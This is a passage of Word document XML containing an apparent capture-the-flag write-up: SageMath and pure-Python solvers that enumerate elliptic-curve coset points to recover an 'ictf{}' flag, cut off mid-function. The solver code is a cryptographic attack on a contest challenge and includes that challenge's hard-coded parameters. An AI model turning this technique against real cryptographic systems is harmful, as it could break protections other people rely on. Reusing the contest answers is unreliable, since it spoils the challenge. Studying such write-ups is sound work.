    <w:p w14:paraId="5881424F" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve">        R = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>E.random</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>point(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D9A8BD" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve">        T = cof * R</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462B44E9" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve">        if </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>T !</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>E(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve">0) and r*T == </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>E(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>0):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FF6801" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve">            return T</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55459B2B" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502"/>
    <w:p w14:paraId="6A5EB249" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t>T = kernel_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>gen(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DEA896A" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502"/>
    <w:p w14:paraId="39A67AC1" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>enumerate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve"> coset and try to decode x(P)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C01062" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t>def try_decode(xi):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D416A5F" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve">    x_int = int(xi)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319AB87F" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve">    raw = x_int.to_bytes((x_int.bit_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>length(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>)+7)//8, 'big')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A4AEE4" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve">    for pad in </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>range(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>0, 32):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D610A2" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve">        try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6648EC58" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            s = (b"\x00"*pad + raw</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>).decode</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169FCF7A" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve">            if </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>s.startswith</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>("</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>ictf{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve">") and </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>s.endswith</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>("}"):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE73731" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve">                return s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403D0B4C" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve">            if </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>s.isprintable</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E73ACE" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve">                return "</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>ictf{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>" + s + "}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C79C4B" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve">        except: pass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C3D093" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve">    return None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702568D9" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502"/>
    <w:p w14:paraId="663437AE" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t>X = P0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C48E8F2" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t>for j in range(r):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141D8AD8" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve">    flag = try_decode(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>X.xy()[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>0])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C644EEB" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve">    if flag:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F346E07" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>print(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>"[+] Flag:", flag)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596DE885" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve">        break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687E1852" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve">    X += T</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4877F21B" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t>Run with Docker:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8FDA5D" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t>docker run --rm -it -v "$PWD:/work" -w /work sagemath/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>sagemath:latest</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve"> sage </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>solve.sage</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="75B8F27B" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="00000000" w:rsidP="005F1502">
      <w:r>
        <w:pict w14:anchorId="765144D9">
          <v:rect id="_x0000_i1081" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="533B4A93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Pure Python Solver (solve_python.py)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A8C6D7" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t>from random import randrange</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E0ECFC" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502"/>
    <w:p w14:paraId="44F0794E" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t># Params</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586A859E" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve">p = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>int(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>"0xbde3c425157a83cbe69cee172d27e2ef9c1bd754ff052d4e7e6a26074efcea673eab9438dc45e0786c4ea54a89f9079ddb21", 16)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0994E7E7" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>a,b</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve"> = 5,7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309132CE" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t>target_x = int("0x686be42f9c3f431296a928c288145a847364bb259c9f5738270d48a7fba035377cc23b27f69d6ae0fad76d745fab25d504d5",16)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D56D0EB" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:lastRenderedPageBreak/>
        <w:t>n = 1915401112669764832155688444967632063685280552714174698559105795993909088154715053733286568457561836692127326936769038088</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1699972C" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t>r = 457; m = n//r</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D49379F" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502"/>
    <w:p w14:paraId="1CE790ED" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t>def inv(x): return pow(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>x,p</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>2,p</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AAF967B" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t>def tonelli(n</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>_,p</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2CEA57" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve">    if n_%p==0: return 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F26D69B" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve">    if pow(n</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>_,(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>p-1)//</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>2,p)!=</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>1: return None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1003F1B2" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>q,s</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve"> = p-1,0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025BF709" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve">    while q%2==0: q//=2; s+=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D20BEAE" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve">    z=2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3FEBB6" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve">    while pow(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>z,(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>p-1)//</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>2,p)!=</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>p-1: z+=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B426F13" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve">    m_=s; c=pow(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>z,q</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>,p); t=pow(n</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>_,q</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>,p); r_=pow(n</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>_,(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>q+1)//</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>2,p</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EABEA19" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve">    while </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>t!=</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74406B6A" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve">        i=1; t2=pow(t,</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>2,p</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6665B366" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve">        while t</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>2!=</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>1: t2=pow(t2,</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>2,p</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>); i+=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A02D7D" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve">        b=pow(c,1&lt;&lt;(m_-i-1</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>),p</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>); m_=i; c=(b*</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>b)%</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>p; t=(t*</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>c)%</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>p; r_=(r_*</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>b)%</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FE01A8" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve">    return r_</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10925D6E" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t>O=None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A16FECE" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t>def add(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>P,Q</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3A075E" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve">    if P is None: return Q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30397585" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve">    if Q is None: return P</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275E3706" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve">    x</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>1,y</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>1=P; x</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>2,y</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>2=Q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6471B480" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve">    if x1==x2 and (y1+y</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>2)%</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>p==0: return O</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79266BBD" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve">    if </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>P!=</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>Q: lam=((y2-y</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>1)*</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>inv((x2-x</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>1)%</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>p</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>))%</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52001850" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve">    else:</w:t>
      </w:r>
    </w:p>
